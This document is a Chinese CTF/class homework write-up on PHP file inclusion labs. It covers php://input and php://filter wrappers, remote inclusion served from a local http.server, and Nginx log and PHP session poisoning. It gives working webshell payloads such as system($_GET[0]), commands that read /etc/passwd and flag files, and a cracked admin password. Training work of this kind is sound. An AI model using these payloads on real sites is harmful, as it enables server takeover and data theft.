班级作业笔记报告0x03

作业1:

文件包含漏洞php://伪协议

经典代码

看了下phpinfo信息

allow_url_fopen=On && allow_url_include=On

允许无文件落地getshell

使用php://伪协议的input方法,需要POST请求,但是file参数接收仍需GET传参

POST传参请求体直接窃取flag

<?=system('cat /f*');

作业2:

伪协议

点击连接抓包

?file=show.php

屏幕出现三个tips。。。

传参?file=/etc/passwd,正常回显,而flag会被拦截

使用php://filter不会被拦截,base64读取tips.php文件

?file=php://filter/convert.base64-encode/resource=tips.php

解码后内容源码分析,直接eval输出

最终

echo`cat /*`;

echo`cat /f*`;

作业3:

远程文件包含

echo '<?php phpinfo();system($_GET[0]);?>'>1.txt

python3 -m http.server 6666

查找flag

获取flag

作业4:

日志文件包含

访问网站,获取Cookie值

对Cookie值进行base64解密,发现疑似被反序列化,根据题意,将路径改成中间件日志文件:/var/log/nginx/access.log

发现可以User-agent写入

构造webshell

User-agent: <?php system($_GET[0]);?>

尝试getshell,传参?0=ls /,发现flag,名为flag_sHkqD

获取flag,传参?0=cat /fla*

作业5:

session文件包含

访问首页,访问了后台登录发现需要密码,测试了下登录框没有SQL注入漏洞,首页的点击了数字,抓包发现有个id参数,尝试sql注入,发现存在SQL注入,数字型

获取数据库名

获取表名

获取字段名

获取账户密码,得到了admin/wuhaijiayou

登录后台,发现功能点有个查看文件功能

包含自己的session文件,默认路径为/var/lib/php5/sess_PHPSESSID的值,可以看见响应头的最后有个斜杠/,尝试getshell

写入webshell,记得URL编码

<?php system($_GET[0]);?>

传参?0=ls /

这道题似乎没放flag

个人评价:

这几道题都是很经典的文件包含落地题,文件包含严重可getshell,还可以无文件落地getshell,红队的最爱之一

相关推荐
safedebug16 小时前
此服务器的证书无效 您可能正在连接到一个伪装
笔记·学习
做cv的小昊16 小时前
【TJU】应用统计学——第六周作业(3.3 两个正态总体参数的假设检验、3.4 非正态总体参数的假设检验、4.1 一元线性回归分析)
笔记·算法·数学建模·矩阵·回归·线性回归·学习方法
晨晖216 小时前
linux笔记6
linux·运维·笔记
古方路杰出青年16 小时前
学习笔记1:Python FastAPI极简后端API示例解析
笔记·后端·python·学习·fastapi
羊群智妍16 小时前
2026年GEO监测工具大全|免费AI搜索优化直接用
笔记
江湖人称小鱼哥1 天前
Obsidian-Graphify-让你的笔记库自己长出知识图谱
笔记·知识图谱·obsidian·claude code·graphify·卡帕西
苦 涩1 天前
考研408笔记之计算机网络(三)——数据链路层
笔记·计算机网络·考研408
三品吉他手会点灯1 天前
STM32F103 学习笔记-21-串口通信(第4节)—串口发送和接收代码讲解(中)
笔记·stm32·单片机·嵌入式硬件·学习
雾岛听蓝1 天前
Qt操作指南:窗口组成与菜单栏
开发语言·经验分享·笔记·qt
北山有鸟1 天前
【学习笔记】MIPI CSI-2 协议全解析:从底层封包到像素解析
linux·驱动开发·笔记·学习·相机